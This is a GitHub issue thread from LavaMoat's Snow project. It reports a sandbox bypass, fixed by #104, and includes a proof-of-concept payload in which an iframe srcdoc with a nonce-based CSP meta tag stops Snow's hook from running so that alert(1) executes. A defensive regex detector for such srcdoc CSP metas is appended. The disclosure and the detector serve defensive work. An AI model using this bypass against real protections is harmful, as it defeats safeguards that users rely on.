LavaMoat / snow

Use Snow to finally secure your web app's same origin realms!
https://lavamoat.github.io/snow/demo/
MIT License

Bypass using CSP #94

Closed mmndaniel closed 1 year ago

mmndaniel commented 1 year ago
var d = document.createElement('div');
document.body.appendChild(d);
d.innerHTML = `
<iframe
    srcdoc="
    <meta http-equiv='Content-Security-Policy' content=&quot;script-src 'nonce-pwnd' ;&quot;>
        <iframe src=&quot;javascript:haha&quot;>
        </iframe>
    <script nonce=&quot;pwnd&quot;>frames[0].alert(1);</script>">
</iframe>`

Similar to https://github.com/LavaMoat/snow/issues/90 and https://github.com/LavaMoat/snow/issues/92, using CSP to prevent SNOW_WINDOW from running :)

weizman commented 1 year ago

Think I'm gonna remove srcdoc CSP attempts altogether (read further @ #104)

weizman commented 1 year ago

fixed by #104
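
The PoC in this issue depends on a CSP meta tag shipped inside an iframe's srcdoc. As an added example (not from the issue and not Snow's code; the #104 change itself is not shown on this page), here is a heuristic check that flags HTML strings whose srcdoc carries its own CSP meta, following nested srcdoc levels. The names findSrcdocCsp and decodeEntities and the sample string are constructed for illustration.

```javascript
// Added example, not Snow's code: flag HTML strings in which an iframe's srcdoc
// ships its own CSP <meta>. Regex heuristic for screening strings; regexes do not
// reproduce the HTML parser, so treat a hit as a signal and a miss as inconclusive.
const ENTITIES = { quot: '"', amp: '&', lt: '<', gt: '>', apos: "'" };

// Decode character references, since srcdoc content is attribute-escaped (&quot; etc.).
function decodeEntities(s) {
  return s.replace(/&(#x[0-9a-f]+|#\d+|[a-z]+);/gi, (m, ref) => {
    if (ref[0] !== '#') return ENTITIES[ref.toLowerCase()] ?? m;
    const hex = ref[1].toLowerCase() === 'x';
    const code = parseInt(ref.slice(hex ? 2 : 1), hex ? 16 : 10);
    return code <= 0x10ffff ? String.fromCodePoint(code) : m;
  });
}

const SRCDOC = /<iframe\b[^>]*?\bsrcdoc\s*=\s*(?:"([^"]*)"|'([^']*)')/gi;
const META = /<meta\b[^>]*>/gi;
const IS_CSP = /\bhttp-equiv\s*=\s*["']?content-security-policy\b/i;
const CONTENT = /\bcontent\s*=\s*(?:"([^"]*)"|'([^']*)')/i;
const SCRIPT_DIRECTIVE = /(?:^|;)\s*(?:script-src(?:-elem)?|default-src)\s/i;

// Returns one finding per CSP meta found inside a srcdoc, following nested
// srcdoc attributes up to maxDepth levels (each level is entity-decoded once).
function findSrcdocCsp(html, depth = 1, maxDepth = 8) {
  const findings = [];
  if (depth > maxDepth) return findings;
  for (const m of html.matchAll(SRCDOC)) {
    const doc = decodeEntities(m[1] ?? m[2]);
    // Blank out nested srcdoc values so their metas are reported at their own depth.
    const own = doc.replace(SRCDOC, '<iframe');
    for (const [tag] of own.matchAll(META)) {
      if (!IS_CSP.test(tag)) continue;
      const c = tag.match(CONTENT);
      const policy = c ? (c[1] ?? c[2]).trim() : '';
      // A script-restricting policy is what can block an inline hook injected into the frame.
      findings.push({ depth, policy, restrictsScripts: SCRIPT_DIRECTIVE.test(policy + ' ') });
    }
    findings.push(...findSrcdocCsp(doc, depth + 1, maxDepth));
  }
  return findings;
}

// Constructed sample (same shape as the srcdoc in the report, no script payload).
const SAMPLE = `<iframe srcdoc="<meta http-equiv='Content-Security-Policy' content=&quot;script-src 'nonce-x' ;&quot;><p>x</p>"></iframe>`;
console.log(findSrcdocCsp(SAMPLE));
```

In a browser, the same check is better done on a parsed template element than with regexes, since the HTML parser is the authority on what the frame will actually load.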